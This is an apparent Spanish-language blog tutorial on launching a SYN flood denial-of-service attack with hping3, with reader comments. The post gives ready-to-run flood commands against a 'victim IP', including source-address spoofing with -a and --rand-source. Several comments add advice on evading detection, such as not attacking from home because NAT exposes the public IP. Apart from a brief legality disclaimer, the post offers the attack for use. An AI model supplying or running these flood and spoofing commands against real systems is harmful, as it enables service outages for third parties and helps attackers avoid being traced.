Ataque DDoS (SYN Flood) con Hping3

HPing es una herramienta en linea de comandos que nos permite crear y analizar paquetes TCP/IP, y como tal tiene un muchas utilidades: hacer testing de firewalls, escaneo de puertos, redes y como no… también tiene la capacidad de provocar un SYN Flood Attack (DD0S).

El objetivo de un ataque de este tipo es el envío de peticiones de conexión TCP más rápido de lo que una máquina puede procesar, al fin de saturar los recursos y evitar que la máquina pueda aceptar más conexiones.

Para instalar la ultima versión de hping dependiendo de la distribucion que usemos haríamos:

  • En Debian y derivadas como Ubuntu y Linux Mint.

sudo apt-get install hping3

  • En Fedora

yum install hping3

  • En openSUSE

zypper install hping3

Un ataque clásico de DDoS sería el siguiente

hping3 -p 80  -S --flood ip_victima

donde :

-p 80 es el puerto que elegimos atacar

-S activa el flag Syn

--flood le indica a hping que envie los paquetes a la máxima velocidad posible

ip_victima es la ip o dominio a atacar

Si queremos que nuestra ip no sea visible podemos añadirle la opción -a y la ip que vamos a falsear

hping3 -a ip_falsa -p 80  -S --flood ip_victima

o bien utilizar --rand-source con lo que se generan direcciones de origen ip al azar

Como veis en los ejemplos el testing lo he realizado sobre mi propia red…así que recordaros como es obvio, que los ataques DDoS son considerados delito en muchos países…por lo que please ser responsables con el uso que le deis.

15 comentarios de “Ataque DDoS (SYN Flood) con Hping3

  1. Pingback: Ddos | TagHall

  2. buen tutorial!!
    cuando hizo el testing sobre su propia red comprobó que la dirección ip de donde provenía el ataque era la falsa que usted había puesto?

    • A mi me ha ocurrido algo similar. Desde una red privada, y a través de un router conectado a Internet, he lanzado el ataque desde un pc al servidor.
      El que se ha visto perjudicado ha sido el router, dejandome sin Internet mientras duraba la ejecución del hping3.
      Alguna idea?

  3. Tened en cuenta que nunca debéis realizar ataques desde vuestro propio domicilio, ya que aunque uséis la opción de generar paquetes con valores aleatorios en el campo IP origen ocurrirá que podrían cazaros fácilmente debido a que…………………………………………………………………………… (Pensad el por que vosotros. Venga , venga dad respuestas )

  4. Debido a que haces NAT atraves de una IP publica que te asigna tu ISP, la cual siempre es la misma, sin importar que cambies la IP origen dentro de la red.

  5. Hola estoy haciendo un proyecto de fin de master en Vulnerabilidades del DNS y me gustaria saber si me pueden enviar algun material que tenga disponible de como evitar este tipo de ataques y como destectar que estamos bajo este tipo de ataque, agradecería mucho si me pueden ayudar. Gracias mi e-mail es dariowins@gmail.com

  6. hping3> hping3 -p 80 127.0.0.1
    [open_sockraw] socket(): Operation not permitted
    [main] can’t open raw socket
    child process exited abnormally

    Entrare como root para ver

Deja un comentario